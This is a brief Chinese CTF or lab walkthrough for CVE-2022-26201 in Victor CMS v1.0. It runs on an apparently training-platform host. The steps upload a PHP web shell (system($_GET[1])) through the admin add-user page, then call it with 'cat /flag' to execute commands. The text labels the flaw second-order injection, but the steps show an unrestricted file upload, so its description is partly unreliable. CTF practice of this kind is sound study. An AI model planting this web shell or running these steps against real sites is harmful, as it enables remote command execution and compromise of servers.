CVE-2022-26201
一、漏洞介绍
Victor CMS v1.0 存在二次注入漏洞
二、渗透步骤
1、打开网站
http://eci-2ze9clflsbycp71zbx41.cloudeci1.ichunqiu.com/
2、文件上传
http://eci-2ze9clflsbycp71zbx41.cloudeci1.ichunqiu.com/admin/users.php?source=add_user
<?php
system($_GET[1]);
?>
3、查看flag值
http://eci-2ze9clflsbycp71zbx41.cloudeci1.ichunqiu.com/img/ant.php?1=cat%20/flag